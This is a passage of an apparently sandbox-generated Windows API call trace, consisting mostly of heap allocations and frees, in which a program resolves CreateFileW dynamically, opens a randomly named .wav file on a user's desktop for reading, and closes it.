hHeap=0x1780000) returned 1 [0125.823] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2710 [0125.824] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca838 [0125.824] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2640 [0125.824] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2590 [0125.824] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9a0 [0125.824] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca838 | out: hHeap=0x1780000) returned 1 [0125.824] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2640 | out: hHeap=0x1780000) returned 1 [0125.824] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9a0 | out: hHeap=0x1780000) returned 1 [0125.824] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2590 | out: hHeap=0x1780000) returned 1 [0125.824] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2540 [0125.824] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca898 [0125.824] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25c0 [0125.824] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2640 [0125.824] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa30 [0125.824] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca898 | out: hHeap=0x1780000) returned 1 [0125.824] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25c0 | out: hHeap=0x1780000) returned 1 [0125.824] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa30 | out: hHeap=0x1780000) returned 1 [0125.824] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2640 | out: hHeap=0x1780000) returned 1 [0125.824] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2570 [0125.824] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca850 [0125.824] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2640 [0125.824] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25d0 [0125.824] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca898 [0125.825] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca850 | out: hHeap=0x1780000) returned 1 [0125.825] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2640 | out: hHeap=0x1780000) returned 1 [0125.825] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca898 | out: hHeap=0x1780000) returned 1 [0125.825] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25d0 | out: hHeap=0x1780000) returned 1 [0125.825] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2660 [0125.825] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8e0 [0125.825] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25c0 [0125.825] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2640 [0125.825] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8c8 [0125.825] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8e0 | out: hHeap=0x1780000) returned 1 [0125.825] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25c0 | out: hHeap=0x1780000) returned 1 [0125.825] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8c8 | out: hHeap=0x1780000) returned 1 [0125.825] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2640 | out: hHeap=0x1780000) returned 1 [0125.825] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2640 [0125.825] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca940 [0125.825] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2590 [0125.825] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25d0 [0125.825] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca970 [0125.825] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca940 | out: hHeap=0x1780000) returned 1 [0125.825] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2590 | out: hHeap=0x1780000) returned 1 [0125.825] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca970 | out: hHeap=0x1780000) returned 1 [0125.825] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25d0 | out: hHeap=0x1780000) returned 1 [0125.825] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x772d0000 [0125.826] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9d0 [0125.826] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26e0 [0125.826] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileW", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0125.826] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca7c0 [0125.826] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileW", cchWideChar=12, lpMultiByteStr=0x43ca7c0, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CreateFileW", lpUsedDefaultChar=0x0) returned 12 [0125.826] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7c0 | out: hHeap=0x1780000) returned 1 [0125.826] GetProcAddress (hModule=0x772d0000, lpProcName="CreateFileW") returned 0x7733ed10 [0125.826] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9d0 | out: hHeap=0x1780000) returned 1 [0125.826] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26e0 | out: hHeap=0x1780000) returned 1 [0125.826] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfab8 [0125.826] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2530 [0125.826] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2720 [0125.826] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2590 [0125.826] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25a0 [0125.826] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2670 [0125.827] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25b0 [0125.827] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26e0 [0125.827] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20002) returned 0x499a008 [0125.828] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2530 | out: hHeap=0x1780000) returned 1 [0125.828] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2720 | out: hHeap=0x1780000) returned 1 [0125.828] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2590 | out: hHeap=0x1780000) returned 1 [0125.828] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25a0 | out: hHeap=0x1780000) returned 1 [0125.828] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2670 | out: hHeap=0x1780000) returned 1 [0125.828] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25b0 | out: hHeap=0x1780000) returned 1 [0125.828] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26e0 | out: hHeap=0x1780000) returned 1 [0125.828] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfab8 | out: hHeap=0x1780000) returned 1 [0125.828] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\tK8Qmak8ns0qz6I3UcG.wav" (normalized: "c:\\users\\fd1hvy\\desktop\\tk8qmak8ns0qz6i3ucg.wav"), dwDesiredAccess=0x80000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2a0 [0125.828] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2590 [0125.828] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x214) returned 0x43e9578 [0125.829] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfab8 [0125.829] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa60 [0125.829] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7a8 [0125.829] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7d8 [0125.829] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2670 [0125.829] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7d8 | out: hHeap=0x1780000) returned 1 [0125.829] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2670 | out: hHeap=0x1780000) returned 1 [0125.829] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7a8 | out: hHeap=0x1780000) returned 1 [0125.829] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca880 [0125.829] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca850 [0125.829] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8b0 [0125.829] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25a0 [0125.829] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8b0 | out: hHeap=0x1780000) returned 1 [0125.829] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x60) returned 0x4359a68 [0125.829] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x499a008 | out: hHeap=0x1780000) returned 1 [0125.829] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7c0 [0125.829] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca970 [0125.829] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9a0 [0125.829] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2670 [0125.829] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9a0 | out: hHeap=0x1780000) returned 1 [0125.829] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2670 | out: hHeap=0x1780000) returned 1 [0125.829] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca970 | out: hHeap=0x1780000) returned 1 [0125.830] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8b0 [0125.830] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca970 [0125.830] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8c8 | out: hHeap=0x1780000) returned 1 [0125.830] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25b0 | out: hHeap=0x1780000) returned 1 [0125.830] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca970 | out: hHeap=0x1780000) returned 1 [0125.830] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca940 | out: hHeap=0x1780000) returned 1 [0125.830] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26e0 | out: hHeap=0x1780000) returned 1 [0125.830] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8c8 | out: hHeap=0x1780000) returned 1 [0125.830] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9d0 | out: hHeap=0x1780000) returned 1 [0125.830] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26e0 | out: hHeap=0x1780000) returned 1 [0125.830] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca970 | out: hHeap=0x1780000) returned 1 [0125.830] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7a8 | out: hHeap=0x1780000) returned 1 [0125.830] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2720 | out: hHeap=0x1780000) returned 1 [0125.830] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7f0 | out: hHeap=0x1780000) returned 1 [0125.830] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca808 | out: hHeap=0x1780000) returned 1 [0125.830] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2720 | out: hHeap=0x1780000) returned 1 [0125.830] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa00 | out: hHeap=0x1780000) returned 1 [0125.830] FreeLibrary (hLibModule=0x772d0000) returned 1 [0125.830] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2560 | out: hHeap=0x1780000) returned 1 [0125.830] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2610 | out: hHeap=0x1780000) returned 1 [0125.830] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2710 | out: hHeap=0x1780000) returned 1 [0125.831] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2540 | out: hHeap=0x1780000) returned 1 [0125.831] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2570 | out: hHeap=0x1780000) returned 1 [0125.831] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2660 | out: hHeap=0x1780000) returned 1 [0125.831] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2640 | out: hHeap=0x1780000) returned 1 [0125.831] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfc98 | out: hHeap=0x1780000) returned 1 [0125.831] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9b8 | out: hHeap=0x1780000) returned 1 [0125.831] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2580 | out: hHeap=0x1780000) returned 1 [0125.831] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca598 | out: hHeap=0x1780000) returned 1 [0125.831] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca640 | out: hHeap=0x1780000) returned 1 [0125.831] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca700 | out: hHeap=0x1780000) returned 1 [0125.831] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4f0 | out: hHeap=0x1780000) returned 1 [0125.831] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca658 | out: hHeap=0x1780000) returned 1 [0125.831] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca760 | out: hHeap=0x1780000) returned 1 [0125.831] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca5b0 | out: hHeap=0x1780000) returned 1 [0125.831] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca670 | out: hHeap=0x1780000) returned 1 [0125.831] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca688 | out: hHeap=0x1780000) returned 1 [0125.831] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6b8 | out: hHeap=0x1780000) returned 1 [0125.831] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca778 | out: hHeap=0x1780000) returned 1 [0125.831] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6a0 | out: hHeap=0x1780000) returned 1 [0125.831] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6d0 | out: hHeap=0x1780000) returned 1 [0125.831] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca718 | out: hHeap=0x1780000) returned 1 [0125.831] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6e8 | out: hHeap=0x1780000) returned 1 [0125.831] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca730 | out: hHeap=0x1780000) returned 1 [0125.831] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4a8 | out: hHeap=0x1780000) returned 1 [0125.832] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca490 | out: hHeap=0x1780000) returned 1 [0125.832] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4c0 | out: hHeap=0x1780000) returned 1 [0125.832] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca928 | out: hHeap=0x1780000) returned 1 [0125.832] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4d8 | out: hHeap=0x1780000) returned 1 [0125.832] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca988 | out: hHeap=0x1780000) returned 1 [0125.832] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca910 | out: hHeap=0x1780000) returned 1 [0125.832] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca820 | out: hHeap=0x1780000) returned 1 [0125.832] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca958 | out: hHeap=0x1780000) returned 1 [0125.832] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa78 | out: hHeap=0x1780000) returned 1 [0125.832] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca868 | out: hHeap=0x1780000) returned 1 [0125.832] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca790 | out: hHeap=0x1780000) returned 1 [0125.832] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41a5250 | out: hHeap=0x1780000) returned 1 [0125.832] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2700 | out: hHeap=0x1780000) returned 1 [0125.832] PeekMessageW (in: lpMsg=0x144ebfc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ebfc) returned 0 [0125.832] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e97a0 | out: hHeap=0x1780000) returned 1 [0125.832] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2680 | out: hHeap=0x1780000) returned 1 [0125.832] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2670 | out: hHeap=0x1780000) returned 1 [0125.832] PeekMessageW (in: lpMsg=0x144ebfc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ebfc) returned 0 [0125.832] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26e0 | out: hHeap=0x1780000) returned 1 [0125.832] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26e0 | out: hHeap=0x1780000) returned 1 [0125.832] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2540 | out: hHeap=0x1780000) returned 1 [0125.832] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca970 | out: hHeap=0x1780000) returned 1 [0125.832] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf860 | out: hHeap=0x1780000) returned 1 [0125.833] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796fc8 | out: hHeap=0x1780000) returned 1 [0125.833] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25c0 | out: hHeap=0x1780000) returned 1 [0125.833] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2640 | out: hHeap=0x1780000) returned 1 [0125.833] PeekMessageW (in: lpMsg=0x144ebfc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ebfc) returned 0 [0125.833] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2720 | out: hHeap=0x1780000) returned 1 [0125.833] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2660 | out: hHeap=0x1780000) returned 1 [0125.833] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a90b0 | out: hHeap=0x1780000) returned 1 [0125.833] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9d28 | out: hHeap=0x1780000) returned 1 [0125.833] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9d70 | out: hHeap=0x1780000) returned 1 [0125.833] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2220 | out: hHeap=0x1780000) returned 1 [0125.833] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfc48 | out: hHeap=0x1780000) returned 1 [0125.833] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca538 | out: hHeap=0x1780000) returned 1 [0125.833] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfc70 | out: hHeap=0x1780000) returned 1 [0125.833] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26d0 | out: hHeap=0x1780000) returned 1 [0125.833] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf9c8 | out: hHeap=0x1780000) returned 1 [0125.833] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9d10 | out: hHeap=0x1780000) returned 1 [0125.833] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9ce0 | out: hHeap=0x1780000) returned 1 [0125.833] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf4a0 | out: hHeap=0x1780000) returned 1 [0125.833] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e21e0 | out: hHeap=0x1780000) returned 1 [0125.833] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf360 | out: hHeap=0x1780000) returned 1 [0125.833] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9d58 | out: hHeap=0x1780000) returned 1 [0125.833] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9d40 | out: hHeap=0x1780000) returned 1 [0125.833] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2240 | out: hHeap=0x1780000) returned 1 [0125.834] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf8b0 | out: hHeap=0x1780000) returned 1 [0125.834] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9e00 | out: hHeap=0x1780000) returned 1 [0125.834] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4392030 | out: hHeap=0x1780000) returned 1 [0125.834] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2630 | out: hHeap=0x1780000) returned 1 [0125.834] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfa18 | out: hHeap=0x1780000) returned 1 [0125.834] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9cf8 | out: hHeap=0x1780000) returned 1 [0125.834] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfb08 | out: hHeap=0x1780000) returned 1 [0125.834] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e21f0 | out: hHeap=0x1780000) returned 1 [0125.834] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf888 | out: hHeap=0x1780000) returned 1 [0125.834] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca550 | out: hHeap=0x1780000) returned 1 [0125.834] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfb80 | out: hHeap=0x1780000) returned 1 [0125.834] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25f0 | out: hHeap=0x1780000) returned 1 [0125.834] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfa68 | out: hHeap=0x1780000) returned 1 [0125.834] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa60 | out: hHeap=0x1780000) returned 1 [0125.834] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4359a68 | out: hHeap=0x1780000) returned 1 [0125.834] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25a0 | out: hHeap=0x1780000) returned 1 [0125.834] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca850 | out: hHeap=0x1780000) returned 1 [0125.834] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca880 | out: hHeap=0x1780000) returned 1 [0125.834] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7c0 | out: hHeap=0x1780000) returned 1 [0125.834] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8b0 | out: hHeap=0x1780000) returned 1 [0125.834] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9a0 | out: hHeap=0x1780000) returned 1 [0125.834] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8c8 | out: hHeap=0x1780000) returned 1 [0125.834] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca838 | out: hHeap=0x1780000) returned 1 [0125.834] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7a8 | out: hHeap=0x1780000) returned 1 [0125.834] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfab8 | out: hHeap=0x1780000) returned 1 [0125.835] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e9578 | out: hHeap=0x1780000) returned 1 [0125.835] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2590 | out: hHeap=0x1780000) returned 1 [0125.835] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca610 | out: hHeap=0x1780000) returned 1 [0125.835] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca568 | out: hHeap=0x1780000) returned 1 [0125.835] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26c0 | out: hHeap=0x1780000) returned 1 [0125.835] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfa90 | out: hHeap=0x1780000) returned 1 [0125.835] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9cc8 | out: hHeap=0x1780000) returned 1 [0125.835] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2160 | out: hHeap=0x1780000) returned 1 [0125.835] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2180 | out: hHeap=0x1780000) returned 1 [0125.857] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0125.857] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0125.857] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x43c9ce0, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CloseHandle", lpUsedDefaultChar=0x0) returned 12 [0125.857] CloseHandle (hObject=0x2a0) returned 1 [0125.858] FreeLibrary (hLibModule=0x772d0000) returned 1 [0125.858] 